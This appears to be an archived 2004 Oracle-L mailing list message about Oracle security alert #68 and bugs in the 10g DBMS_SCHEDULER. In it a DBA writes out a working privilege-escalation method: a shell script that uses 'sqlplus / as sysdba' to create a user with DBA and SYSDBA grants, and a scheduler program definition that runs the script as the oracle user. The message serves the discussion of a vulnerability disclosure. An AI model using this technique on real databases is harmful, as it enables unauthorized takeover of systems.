Oracle FAQ Your Portal to the Oracle Knowledge Grid

Home -> Community -> Mailing Lists -> Oracle-L -> RE: Oracle advisory for bugs in dbms_scheduler ( alert #68)

RE: Oracle advisory for bugs in dbms_scheduler ( alert #68)

From: Gogala, Mladen <>
Date: Thu, 2 Sep 2004 12:00:41 -0400
Message-ID: <30462D80AA52E74698512ADCC4F7EAA312239722@EXCHANGE>

What annoys me the most is that the bug is so trivial that it should have been discovered during the beta test. You and Pete didn't specify how exactly is it possible, probably out of the goodness of your heart, so I did a little investigation of my own, and discovered that Oracle10g alows shell scripts to be scheduled using DBMS_SCHEDULER. Of course, DBMS_SCHEDULER still uses job queue processes owned by user oracle to schedule those shell scripts. The thing that can be done is to schedule a shell script containing the following sequence: #!/bin/ksh
set -a
echo "Operator, are you pondering what I am pondering?">/dev/console ORAENV_ASK=NO
. /usr/local/bin/oraenv
sqlplus "/ as sysdba"<<EOF
create user brain identified by takeover default tablespace system;
grant connect,resource,dba to brain;
grant sysdba to brain;
EOF If this script is executed by a process owned by user "oracle", "connect / as sysdba" will succeed. The database is mine.

All you need to do is it to run something like this:


   program_name           => 'take_over_the_world',
   program_action         => '/tmp/pinky_and_the_brain',
   program_type           => 'EXECUTABLE',
   comments               => 'I rulez');

and you are ready to create the job and run it. I was astonished how simple and trivial the flaw is. Someone should have thought of that during beta testing. Now, let me put on a wide smile and ask: is that the bug that you and Pete have found?

Mladen Gogala
Oracle DBA
Ext: 9787

> -----Original Message-----
> From: Jonathan Gennick []
> Sent: Thursday, September 02, 2004 8:33 AM
> To: Pete Finnigan
> Cc:
> Subject: Re: Oracle advisory for bugs in
> dbms_scheduler (alert #68)
> This alert apparently covers several flaws. I'm actually
> taken-aback by how long it's taken Oracle to respond to the
> one Pete and I uncovered back in March, which let's you
> leverage the new scheduler to gain access to the Oracle user,
> and thence to grant yourself DBA privileges.
> Best regards,
> Jonathan Gennick --- Brighten the corner where you are * 906.387.1698 * Join the Oracle-article list and receive one article on Oracle technologies per month by email. To join, visit, or send email to and include the word "subscribe" in either the subject or body. Wednesday, September 1, 2004, 3:06:15 PM, Pete Finnigan ( wrote: PF> Hi everyone, PF> Oracle released last night alert #68 covering fixes for many PF> security bugs in Oracle. found security bugs in the PF> new 10gR1 scheduler functionality. Our security advisory can be PF> found at PF> Kind regards PF> Pete --- To unsubscribe - To read recent messages - --- To unsubscribe - To read recent messages -
Received on Thu Sep 02 2004 - 15:58:04 CDT

Original text of this message